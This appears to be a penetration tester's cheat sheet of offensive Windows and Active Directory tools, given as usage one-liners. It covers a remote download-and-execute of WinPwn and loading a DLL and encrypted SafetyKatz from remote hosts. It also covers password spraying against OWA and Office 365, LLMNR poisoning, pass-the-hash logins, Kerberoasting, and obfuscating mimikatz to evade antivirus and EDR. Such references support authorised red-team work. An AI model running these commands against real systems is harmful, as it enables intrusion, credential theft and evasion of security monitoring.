https://amsi.fail/
Import-Module .\WinPwn.ps1
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/master/WinPwn.ps1')
https://github.com/GhostPack
Seatbelt, KeeThief, Rubeus, SharpUp ...
PowerView, PowerUp, Get-GPPPassword ...
SharpHound.exe -d testdomain.com -c all,gpolocalgroup
Sharphound.ps1 -d testdomain.com -c all,gpolocalgroup
bloodhound.py -c all
https://github.com/adrecon/ADRecon
To run ADRecon on a domain member host.
PS C:\> .\ADRecon.ps1
To run ADRecon on a domain member host as a different user.
PS C:\>.\ADRecon.ps1 -DomainController <IP or FQDN> -Credential <domain\username>
To run ADRecon on a non-member host using LDAP.
PS C:\>.\ADRecon.ps1 -Method LDAP -DomainController <IP or FQDN> -Credential <domain\username>
Lync/Skype & OWA sprayer, wordlist-generator, naming scheme converter etc.
Spraying OWA
./atomizer.py owa contoso.com 'Fall2018' emails.txt
Spraying Lync
./atomizer lync contoso.com --user-as-pass usernames.txt
Recon mode
./atomizer owa 'https://owa.contoso.com/autodiscover/autodiscover.xml' --recon
Attack OWA & EWS
Namingscheme should be like testdomain.com\schmidta or aschmidt -> check scheme with msf module
Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile owa-sprayed-creds.txt
Get-ADUsernameFromEWS -EmailList email-list.txt
Get-GlobalAddressList -ExchHostname mail.domain.com -UserName domain\username -Password Fall2016 -OutFile global-address-list.txt
https://github.com/0xZDH/msspray
O365 Enum & Spray Tool
Just Enum Users without spraying. Needs a textfile with complete mailadresses [email protected]
python3 msspray.py -e -u textfile.txt --wait 10 --verbose
O365 Sprayer
Import-Module MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\userlist.txt -Password Winter2020
Attack EWS via NTLM Authentication over HTTP.
./exchangeRelayx.py -t https://mail.quickbreach.com
Port of PowerView to .NET
SharpView.exe Get-DomainController -Domain test.local -Server dc.test.local -Credential [email protected]/password
Gather Mailadresses / Users
python3 crosslinked.py -f '{first}.{last}@domain.com' company_name
Official Docu: https://mpgn.gitbook.io/crackmapexec/
https://github.com/mrnamp/EvilWinRM
A tool to interact with Microsoft´s WS-Management implementation aka Powershell-Remoting from a Linux box.
Can also be used to connect with a hash instead of password.
ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -p 'MySuperSecr3tPass123!'
ruby evil-winrm.rb -i 192.168.1.100 -u Administrator -H B3D7E7E1516FFBFCB1C54A4C349BC099
Also capable of executing C#, DLLs or donut shellcode afterwards directly in memory. The executables must be in the path set at -e argument.
Invoke-Binary /opt/csharp/Binary.exe 'param1, param2, param3'
Dll-loader -http -path http://10.11.12.13/evil.dll
Donut-Loader -process_id 1234 -donutfile /use/share/payload.bin
Can also bypass AMSI, fetch Kerberos tickets and so on ...
Execute stuff over RDP. User will get a notification if multi-RDP is not enabled!
SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password
PowerShell ADIDNS/LLMNR/mDNS/NBNS/DNS spoofer and man-in-the-middle tool
Import-Module Inveigh.psm1
Invoke-Inveigh -Consoleoutput Y
https://github.com/lgandx/Responder
LLMNR/NBT-NS/mDNS Poisoner
./Responder.py -I eth0
https://github.com/cobbr/Covenant
https://github.com/SecWiki
Exploits for Linux & Windows
https://github.com/p3nt4/PowerShdll
Powershell without Powershell
rundll32 PowerShdll,main -w
https://github.com/hfiref0x/UACME
https://github.com/phra/PEzor
Obfuscate C / C++ binaries
New module -> ShellCode fluctuation:
PEzor -fluctuate=RW -debug mimikatz.exe -p '"coffee" "sleep 5000" "coffee" "exit"'
Fork of Donut shellcode / PE generator with syscalls
https://github.com/EgeBalci/amber
Obfuscate C / C++ binaries
Obfuscator for PowerShell scripts.
https://github.com/the-xentropy/xencrypt / https://github.com/GetRektBoy724/BetterXencrypt
Collection of Tools to bypass AV/EDR and stuff
Import-Module ./xencrypt.ps1
Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1
Invoke-Xencrypt -InFile invoke-mimikatz.ps1 -OutFile xenmimi.ps1 -Iterations 100
Obfuscator and encrypter for PowerShell scripts.
Tools collection for PowerShell ISE. Obfuscation possibilities.
Convert PS1 to EXE file.
A wrapper for C# binaries that encrypts the payload and decrypts it in memory.
Encrypt binary:
Invoke-SharpEncrypt -file C:\CSharpFiles\SafetyKatz.exe -password S3cur3Th1sSh1t -outfile C:\CSharpEncrypted\SafetyKatz.enc
Load encrypted binary from URL:
Invoke-SharpLoader -location https://raw.githubusercontent.com/S3cur3Th1sSh1t/Invoke-SharpLoader/master/EncryptedCSharp/SafetyKatz.enc -password S3cur3Th1sSh1t -noArgs
Load encrypted binary from disk with commandline arguments:
Invoke-SharpLoader -location C:\EncryptedCSharp\Rubeus.enc -password S3cur3Th1sSh1t -argument kerberoast -argument2 "/format:hashcat"
Obfuscator for C# and Powershell
PowerShell Script obfuscator
C# assembly obfuscator
C# assembly obfuscator
https://github.com/9emin1/charlotte
Shellcode Loader via D-Invoke
C/C++ source obfuscator
SharpSploit: https://github.com/cobbr/SharpSploit
ZeroLogon-Tester: https://github.com/BC-SECURITY/Invoke-ZeroLogon / https://github.com/SecuraBV/CVE-2020-1472
Ligolo: https://github.com/sysdream/ligolo
Metasploit: https://github.com/rapid7/metasploit-framework
Socat: https://github.com/craSH/socat
ThreatCheck: https://github.com/rasta-mouse/ThreatCheck
evilginx2: https://github.com/kgretzky/evilginx2
O365 Enum: https://github.com/gremwell/o365enum
O365 spray: https://github.com/0xZDH/o365spray